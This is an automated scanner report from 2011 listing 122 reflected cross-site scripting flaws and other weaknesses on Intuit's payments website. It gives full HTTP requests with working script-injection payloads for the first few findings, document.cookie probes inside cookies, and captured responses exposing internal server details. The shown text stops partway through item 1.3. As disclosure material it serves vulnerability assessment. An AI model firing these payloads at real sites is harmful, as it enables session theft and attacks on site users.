XSS, Cross Site Scripting, payments.intuit.com, CWE-79, CAPEC-86

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Mon Mar 21 14:59:37 CDT 2011.



1. Cross-site scripting (reflected)

1.1. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [bas parameter]

1.2. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [bas parameter]

1.3. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [bas parameter]

1.4. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [uaenv parameter]

1.5. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [uaenv parameter]

1.6. http://payments.intuit.com/ [Referer HTTP header]

1.7. http://payments.intuit.com/ [Referer HTTP header]

1.8. http://payments.intuit.com/ [Referer HTTP header]

1.9. http://payments.intuit.com/apply-now/ [Referer HTTP header]

1.10. http://payments.intuit.com/apply-now/ [Referer HTTP header]

1.11. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [Referer HTTP header]

1.12. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [Referer HTTP header]

1.13. http://payments.intuit.com/apply-now/contact-me.jsp [Referer HTTP header]

1.14. http://payments.intuit.com/apply-now/contact-me.jsp [Referer HTTP header]

1.15. http://payments.intuit.com/products/ [Referer HTTP header]

1.16. http://payments.intuit.com/products/ [Referer HTTP header]

1.17. http://payments.intuit.com/products/basic-payment-solutions/ [Referer HTTP header]

1.18. http://payments.intuit.com/products/basic-payment-solutions/ [Referer HTTP header]

1.19. http://payments.intuit.com/products/basic-payment-solutions/check-processing.jsp [Referer HTTP header]

1.20. http://payments.intuit.com/products/basic-payment-solutions/check-processing.jsp [Referer HTTP header]

1.21. http://payments.intuit.com/products/basic-payment-solutions/credit-card-processing-equipment.jsp [Referer HTTP header]

1.22. http://payments.intuit.com/products/basic-payment-solutions/credit-card-processing-equipment.jsp [Referer HTTP header]

1.23. http://payments.intuit.com/products/basic-payment-solutions/index.jsp [Referer HTTP header]

1.24. http://payments.intuit.com/products/basic-payment-solutions/index.jsp [Referer HTTP header]

1.25. http://payments.intuit.com/products/basic-payment-solutions/mobile-credit-card-processing.jsp [Referer HTTP header]

1.26. http://payments.intuit.com/products/basic-payment-solutions/mobile-credit-card-processing.jsp [Referer HTTP header]

1.27. http://payments.intuit.com/products/basic-payment-solutions/quicken-merchant-services.jsp [Referer HTTP header]

1.28. http://payments.intuit.com/products/basic-payment-solutions/quicken-merchant-services.jsp [Referer HTTP header]

1.29. http://payments.intuit.com/products/check-processing-solutions/check-processing-solution.jsp [Referer HTTP header]

1.30. http://payments.intuit.com/products/check-processing-solutions/check-processing-solution.jsp [Referer HTTP header]

1.31. http://payments.intuit.com/products/check-processing-solutions/online-check-service.jsp [Referer HTTP header]

1.32. http://payments.intuit.com/products/check-processing-solutions/online-check-service.jsp [Referer HTTP header]

1.33. http://payments.intuit.com/products/echecks-and-check-processing.jsp [Referer HTTP header]

1.34. http://payments.intuit.com/products/echecks-and-check-processing.jsp [Referer HTTP header]

1.35. http://payments.intuit.com/products/internet-merchant-accounts.jsp [Referer HTTP header]

1.36. http://payments.intuit.com/products/internet-merchant-accounts.jsp [Referer HTTP header]

1.37. http://payments.intuit.com/products/online-credit-card-processing.jsp [Referer HTTP header]

1.38. http://payments.intuit.com/products/online-credit-card-processing.jsp [Referer HTTP header]

1.39. http://payments.intuit.com/products/quickbooks-credit-card-processing-services.jsp [Referer HTTP header]

1.40. http://payments.intuit.com/products/quickbooks-credit-card-processing-services.jsp [Referer HTTP header]

1.41. http://payments.intuit.com/products/quickbooks-payment-processing.jsp [Referer HTTP header]

1.42. http://payments.intuit.com/products/quickbooks-payment-processing.jsp [Referer HTTP header]

1.43. http://payments.intuit.com/products/quickbooks-payment-solutions/ [Referer HTTP header]

1.44. http://payments.intuit.com/products/quickbooks-payment-solutions/ [Referer HTTP header]

1.45. http://payments.intuit.com/products/quickbooks-payment-solutions/ach.jsp [Referer HTTP header]

1.46. http://payments.intuit.com/products/quickbooks-payment-solutions/ach.jsp [Referer HTTP header]

1.47. http://payments.intuit.com/products/quickbooks-payment-solutions/credit-card-processing-services.jsp [Referer HTTP header]

1.48. http://payments.intuit.com/products/quickbooks-payment-solutions/credit-card-processing-services.jsp [Referer HTTP header]

1.49. http://payments.intuit.com/products/quickbooks-payment-solutions/custom-gift-card-program.jsp [Referer HTTP header]

1.50. http://payments.intuit.com/products/quickbooks-payment-solutions/custom-gift-card-program.jsp [Referer HTTP header]

1.51. http://payments.intuit.com/products/quickbooks-payment-solutions/online-credit-card-processing.jsp [Referer HTTP header]

1.52. http://payments.intuit.com/products/quickbooks-payment-solutions/online-credit-card-processing.jsp [Referer HTTP header]

1.53. http://payments.intuit.com/products/quickbooks-payment-solutions/point-of-sale-solutions.jsp [Referer HTTP header]

1.54. http://payments.intuit.com/products/quickbooks-payment-solutions/point-of-sale-solutions.jsp [Referer HTTP header]

1.55. http://payments.intuit.com/products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp [Referer HTTP header]

1.56. http://payments.intuit.com/products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp [Referer HTTP header]

1.57. http://payments.intuit.com/products/quickbooks-payment-solutions/quickbooks-online-billing.jsp [Referer HTTP header]

1.58. http://payments.intuit.com/products/quickbooks-payment-solutions/quickbooks-online-billing.jsp [Referer HTTP header]

1.59. http://payments.intuit.com/products/quickbooks-payment-solutions/web-credit-card-processing.jsp [Referer HTTP header]

1.60. http://payments.intuit.com/products/quickbooks-payment-solutions/web-credit-card-processing.jsp [Referer HTTP header]

1.61. http://payments.intuit.com/support/ [Referer HTTP header]

1.62. http://payments.intuit.com/support/ [Referer HTTP header]

1.63. http://payments.intuit.com/support/glossary.jsp [Referer HTTP header]

1.64. http://payments.intuit.com/support/glossary.jsp [Referer HTTP header]

1.65. http://payments.intuit.com/ [abTestGroup cookie]

1.66. http://payments.intuit.com/ [abTestGroup cookie]

1.67. http://payments.intuit.com/apply-now/ [abTestGroup cookie]

1.68. http://payments.intuit.com/apply-now/ [abTestGroup cookie]

1.69. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [abTestGroup cookie]

1.70. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [abTestGroup cookie]

1.71. http://payments.intuit.com/apply-now/contact-me.jsp [abTestGroup cookie]

1.72. http://payments.intuit.com/apply-now/contact-me.jsp [abTestGroup cookie]

1.73. http://payments.intuit.com/products/ [abTestGroup cookie]

1.74. http://payments.intuit.com/products/ [abTestGroup cookie]

1.75. http://payments.intuit.com/products/basic-payment-solutions/ [abTestGroup cookie]

1.76. http://payments.intuit.com/products/basic-payment-solutions/ [abTestGroup cookie]

1.77. http://payments.intuit.com/products/basic-payment-solutions/check-processing.jsp [abTestGroup cookie]

1.78. http://payments.intuit.com/products/basic-payment-solutions/check-processing.jsp [abTestGroup cookie]

1.79. http://payments.intuit.com/products/basic-payment-solutions/credit-card-processing-equipment.jsp [abTestGroup cookie]

1.80. http://payments.intuit.com/products/basic-payment-solutions/credit-card-processing-equipment.jsp [abTestGroup cookie]

1.81. http://payments.intuit.com/products/basic-payment-solutions/index.jsp [abTestGroup cookie]

1.82. http://payments.intuit.com/products/basic-payment-solutions/index.jsp [abTestGroup cookie]

1.83. http://payments.intuit.com/products/basic-payment-solutions/mobile-credit-card-processing.jsp [abTestGroup cookie]

1.84. http://payments.intuit.com/products/basic-payment-solutions/mobile-credit-card-processing.jsp [abTestGroup cookie]

1.85. http://payments.intuit.com/products/basic-payment-solutions/quicken-merchant-services.jsp [abTestGroup cookie]

1.86. http://payments.intuit.com/products/basic-payment-solutions/quicken-merchant-services.jsp [abTestGroup cookie]

1.87. http://payments.intuit.com/products/check-processing-solutions/check-processing-solution.jsp [abTestGroup cookie]

1.88. http://payments.intuit.com/products/check-processing-solutions/check-processing-solution.jsp [abTestGroup cookie]

1.89. http://payments.intuit.com/products/check-processing-solutions/online-check-service.jsp [abTestGroup cookie]

1.90. http://payments.intuit.com/products/check-processing-solutions/online-check-service.jsp [abTestGroup cookie]

1.91. http://payments.intuit.com/products/echecks-and-check-processing.jsp [abTestGroup cookie]

1.92. http://payments.intuit.com/products/echecks-and-check-processing.jsp [abTestGroup cookie]

1.93. http://payments.intuit.com/products/internet-merchant-accounts.jsp [abTestGroup cookie]

1.94. http://payments.intuit.com/products/internet-merchant-accounts.jsp [abTestGroup cookie]

1.95. http://payments.intuit.com/products/online-credit-card-processing.jsp [abTestGroup cookie]

1.96. http://payments.intuit.com/products/online-credit-card-processing.jsp [abTestGroup cookie]

1.97. http://payments.intuit.com/products/quickbooks-credit-card-processing-services.jsp [abTestGroup cookie]

1.98. http://payments.intuit.com/products/quickbooks-credit-card-processing-services.jsp [abTestGroup cookie]

1.99. http://payments.intuit.com/products/quickbooks-payment-processing.jsp [abTestGroup cookie]

1.100. http://payments.intuit.com/products/quickbooks-payment-processing.jsp [abTestGroup cookie]

1.101. http://payments.intuit.com/products/quickbooks-payment-solutions/ [abTestGroup cookie]

1.102. http://payments.intuit.com/products/quickbooks-payment-solutions/ [abTestGroup cookie]

1.103. http://payments.intuit.com/products/quickbooks-payment-solutions/ach.jsp [abTestGroup cookie]

1.104. http://payments.intuit.com/products/quickbooks-payment-solutions/ach.jsp [abTestGroup cookie]

1.105. http://payments.intuit.com/products/quickbooks-payment-solutions/credit-card-processing-services.jsp [abTestGroup cookie]

1.106. http://payments.intuit.com/products/quickbooks-payment-solutions/credit-card-processing-services.jsp [abTestGroup cookie]

1.107. http://payments.intuit.com/products/quickbooks-payment-solutions/custom-gift-card-program.jsp [abTestGroup cookie]

1.108. http://payments.intuit.com/products/quickbooks-payment-solutions/custom-gift-card-program.jsp [abTestGroup cookie]

1.109. http://payments.intuit.com/products/quickbooks-payment-solutions/online-credit-card-processing.jsp [abTestGroup cookie]

1.110. http://payments.intuit.com/products/quickbooks-payment-solutions/online-credit-card-processing.jsp [abTestGroup cookie]

1.111. http://payments.intuit.com/products/quickbooks-payment-solutions/point-of-sale-solutions.jsp [abTestGroup cookie]

1.112. http://payments.intuit.com/products/quickbooks-payment-solutions/point-of-sale-solutions.jsp [abTestGroup cookie]

1.113. http://payments.intuit.com/products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp [abTestGroup cookie]

1.114. http://payments.intuit.com/products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp [abTestGroup cookie]

1.115. http://payments.intuit.com/products/quickbooks-payment-solutions/quickbooks-online-billing.jsp [abTestGroup cookie]

1.116. http://payments.intuit.com/products/quickbooks-payment-solutions/quickbooks-online-billing.jsp [abTestGroup cookie]

1.117. http://payments.intuit.com/products/quickbooks-payment-solutions/web-credit-card-processing.jsp [abTestGroup cookie]

1.118. http://payments.intuit.com/products/quickbooks-payment-solutions/web-credit-card-processing.jsp [abTestGroup cookie]

1.119. http://payments.intuit.com/support/ [abTestGroup cookie]

1.120. http://payments.intuit.com/support/ [abTestGroup cookie]

1.121. http://payments.intuit.com/support/glossary.jsp [abTestGroup cookie]

1.122. http://payments.intuit.com/support/glossary.jsp [abTestGroup cookie]

2. Cookie scoped to parent domain

2.1. http://payments.intuit.com/

2.2. http://payments.intuit.com/apply-now/

2.3. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp

2.4. http://payments.intuit.com/apply-now/contact-me.jsp

2.5. http://payments.intuit.com/products/

2.6. http://payments.intuit.com/products/basic-payment-solutions/

2.7. http://payments.intuit.com/products/basic-payment-solutions/check-processing.jsp

2.8. http://payments.intuit.com/products/basic-payment-solutions/credit-card-processing-equipment.jsp

2.9. http://payments.intuit.com/products/basic-payment-solutions/index.jsp

2.10. http://payments.intuit.com/products/basic-payment-solutions/mobile-credit-card-processing.jsp

2.11. http://payments.intuit.com/products/basic-payment-solutions/quicken-merchant-services.jsp

2.12. http://payments.intuit.com/products/check-processing-solutions/check-processing-solution.jsp

2.13. http://payments.intuit.com/products/check-processing-solutions/online-check-service.jsp

2.14. http://payments.intuit.com/products/echecks-and-check-processing.jsp

2.15. http://payments.intuit.com/products/internet-merchant-accounts.jsp

2.16. http://payments.intuit.com/products/online-credit-card-processing.jsp

2.17. http://payments.intuit.com/products/quickbooks-credit-card-processing-services.jsp

2.18. http://payments.intuit.com/products/quickbooks-payment-processing.jsp

2.19. http://payments.intuit.com/products/quickbooks-payment-solutions/

2.20. http://payments.intuit.com/products/quickbooks-payment-solutions/ach.jsp

2.21. http://payments.intuit.com/products/quickbooks-payment-solutions/credit-card-processing-services.jsp

2.22. http://payments.intuit.com/products/quickbooks-payment-solutions/custom-gift-card-program.jsp

2.23. http://payments.intuit.com/products/quickbooks-payment-solutions/online-credit-card-processing.jsp

2.24. http://payments.intuit.com/products/quickbooks-payment-solutions/point-of-sale-solutions.jsp

2.25. http://payments.intuit.com/products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp

2.26. http://payments.intuit.com/products/quickbooks-payment-solutions/quickbooks-online-billing.jsp

2.27. http://payments.intuit.com/products/quickbooks-payment-solutions/web-credit-card-processing.jsp

2.28. http://payments.intuit.com/sbweb/common/includes/header/super_navigation/includes/search.jsp

2.29. http://payments.intuit.com/support/

2.30. http://payments.intuit.com/support/glossary.jsp

3. Cookie without HttpOnly flag set

3.1. http://payments.intuit.com/

3.2. http://payments.intuit.com/apply-now/

3.3. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp

3.4. http://payments.intuit.com/apply-now/contact-me.jsp

3.5. http://payments.intuit.com/products/

3.6. http://payments.intuit.com/products/basic-payment-solutions/

3.7. http://payments.intuit.com/products/basic-payment-solutions/check-processing.jsp

3.8. http://payments.intuit.com/products/basic-payment-solutions/credit-card-processing-equipment.jsp

3.9. http://payments.intuit.com/products/basic-payment-solutions/index.jsp

3.10. http://payments.intuit.com/products/basic-payment-solutions/mobile-credit-card-processing.jsp

3.11. http://payments.intuit.com/products/basic-payment-solutions/quicken-merchant-services.jsp

3.12. http://payments.intuit.com/products/check-processing-solutions/check-processing-solution.jsp

3.13. http://payments.intuit.com/products/check-processing-solutions/online-check-service.jsp

3.14. http://payments.intuit.com/products/echecks-and-check-processing.jsp

3.15. http://payments.intuit.com/products/internet-merchant-accounts.jsp

3.16. http://payments.intuit.com/products/online-credit-card-processing.jsp

3.17. http://payments.intuit.com/products/quickbooks-credit-card-processing-services.jsp

3.18. http://payments.intuit.com/products/quickbooks-payment-processing.jsp

3.19. http://payments.intuit.com/products/quickbooks-payment-solutions/

3.20. http://payments.intuit.com/products/quickbooks-payment-solutions/ach.jsp

3.21. http://payments.intuit.com/products/quickbooks-payment-solutions/credit-card-processing-services.jsp

3.22. http://payments.intuit.com/products/quickbooks-payment-solutions/custom-gift-card-program.jsp

3.23. http://payments.intuit.com/products/quickbooks-payment-solutions/online-credit-card-processing.jsp

3.24. http://payments.intuit.com/products/quickbooks-payment-solutions/point-of-sale-solutions.jsp

3.25. http://payments.intuit.com/products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp

3.26. http://payments.intuit.com/products/quickbooks-payment-solutions/quickbooks-online-billing.jsp

3.27. http://payments.intuit.com/products/quickbooks-payment-solutions/web-credit-card-processing.jsp

3.28. http://payments.intuit.com/sbweb/common/includes/header/super_navigation/includes/search.jsp

3.29. http://payments.intuit.com/support/

3.30. http://payments.intuit.com/support/glossary.jsp

4. Source code disclosure

5. Cross-domain Referer leakage

5.1. http://payments.intuit.com/

5.2. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp

5.3. http://payments.intuit.com/products/basic-payment-solutions/mobile-credit-card-processing.jsp

5.4. http://payments.intuit.com/products/echecks-and-check-processing.jsp

5.5. http://payments.intuit.com/products/quickbooks-credit-card-processing-services.jsp

6. Cross-domain script include

7. Email addresses disclosed

7.1. http://payments.intuit.com/apply-now/contact-me.jsp

7.2. http://payments.intuit.com/products/basic-payment-solutions/mobile-credit-card-processing.jsp

7.3. http://payments.intuit.com/products/echecks-and-check-processing.jsp

7.4. http://payments.intuit.com/products/quickbooks-payment-solutions/point-of-sale-solutions.jsp

7.5. http://payments.intuit.com/sbweb/common/components/site_catalyst/header/sc_header_scode.js

7.6. http://payments.intuit.com/templates/tt-hp-template/js/jquery.hoverIntent.js

8. Private IP addresses disclosed

8.1. http://payments.intuit.com/

8.2. http://payments.intuit.com/

8.3. http://payments.intuit.com/apply-now/

8.4. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp

8.5. http://payments.intuit.com/apply-now/contact-me.jsp

8.6. http://payments.intuit.com/products/

8.7. http://payments.intuit.com/products/basic-payment-solutions/

8.8. http://payments.intuit.com/products/basic-payment-solutions/check-processing.jsp

8.9. http://payments.intuit.com/products/basic-payment-solutions/credit-card-processing-equipment.jsp

8.10. http://payments.intuit.com/products/basic-payment-solutions/index.jsp

8.11. http://payments.intuit.com/products/basic-payment-solutions/mobile-credit-card-processing.jsp

8.12. http://payments.intuit.com/products/basic-payment-solutions/quicken-merchant-services.jsp

8.13. http://payments.intuit.com/products/check-processing-solutions/check-processing-solution.jsp

8.14. http://payments.intuit.com/products/check-processing-solutions/online-check-service.jsp

8.15. http://payments.intuit.com/products/echecks-and-check-processing.jsp

8.16. http://payments.intuit.com/products/internet-merchant-accounts.jsp

8.17. http://payments.intuit.com/products/online-credit-card-processing.jsp

8.18. http://payments.intuit.com/products/quickbooks-credit-card-processing-services.jsp

8.19. http://payments.intuit.com/products/quickbooks-payment-processing.jsp

8.20. http://payments.intuit.com/products/quickbooks-payment-solutions/

8.21. http://payments.intuit.com/products/quickbooks-payment-solutions/ach.jsp

8.22. http://payments.intuit.com/products/quickbooks-payment-solutions/credit-card-processing-services.jsp

8.23. http://payments.intuit.com/products/quickbooks-payment-solutions/custom-gift-card-program.jsp

8.24. http://payments.intuit.com/products/quickbooks-payment-solutions/online-credit-card-processing.jsp

8.25. http://payments.intuit.com/products/quickbooks-payment-solutions/point-of-sale-solutions.jsp

8.26. http://payments.intuit.com/products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp

8.27. http://payments.intuit.com/products/quickbooks-payment-solutions/quickbooks-online-billing.jsp

8.28. http://payments.intuit.com/products/quickbooks-payment-solutions/web-credit-card-processing.jsp

8.29. http://payments.intuit.com/sbweb/common/includes/header/super_navigation/includes/search.jsp

8.30. http://payments.intuit.com/support/

8.31. http://payments.intuit.com/support/glossary.jsp

9. HTML does not specify charset

10. Content type incorrectly stated



1. Cross-site scripting (reflected)
There are 122 instances of this issue:


1.1. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [bas parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /apply-now/check-warranty-apply-now.jsp

Issue detail

The value of the bas request parameter is copied into a JavaScript rest-of-line comment. The payload 5917f%0aalert(1)//0f2714cf68b was submitted in the bas parameter. This input was echoed as 5917f
alert(1)//0f2714cf68b
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /apply-now/check-warranty-apply-now.jsp?requestType=rtnFromUA&uaenv=prod&bas=card5917f%0aalert(1)//0f2714cf68b HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:02:30 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=um+gvySdzc86szkJlLldjw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:39:31 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95E2A450A0805192AA117E3E34C4700
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dwarranty_002dapply_002dnow_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 161486


...[SNIP]...
cked',true);    
            }
        if(selectedServiceIndicator == "selected_check_service_id_3")
        {
               //$("#selected_check_service_id_3").attr('checked',true);    
        }
           
       }
       //var bas = 'card5917f
alert(1)//0f2714cf68b
';
    //var parameterString1="changeInService=alreadyHvScanner&bas="+bas+"&category=changeInService&categoryType=7";
    //invokeAJAX(parameterString1);
   }

   
   function processResponse(respo
...[SNIP]...

1.2. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [bas parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /apply-now/check-warranty-apply-now.jsp

Issue detail

The value of the bas request parameter is copied into an HTML comment. The payload d670a--><script>alert(1)</script>afe168cf1c was submitted in the bas parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /apply-now/check-warranty-apply-now.jsp?requestType=rtnFromUA&uaenv=prod&bas=cardd670a--><script>alert(1)</script>afe168cf1c HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:02:23 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=kH34osQKwEbdp4qaYa77bg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:39:24 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95E11310A0805192AA117E3E38F36B5
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dwarranty_002dapply_002dnow_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 161643


...[SNIP]...
<input type="radio" id="is_existing_merchant_true" name="is_existing_merchant" value="true" onclick="setMerchantFlag('true','cardd670a--><script>alert(1)</script>afe168cf1c');" />
...[SNIP]...

1.3. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [bas parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /apply-now/check-warranty-apply-now.jsp

Issue detail

The value of the bas request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbd42"><script>alert(1)</script>c5a639cbe3e was submitted in the bas parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /apply-now/check-warranty-apply-now.jsp?requestType=rtnFromUA&uaenv=prod&bas=cardfbd42"><script>alert(1)</script>c5a639cbe3e HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:00:24 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=6X7mnOxDx5FEMyyRLsH-gg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:37:25 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95C3E8D0A0805192AA117E3F1EDA955
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dwarranty_002dapply_002dnow_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
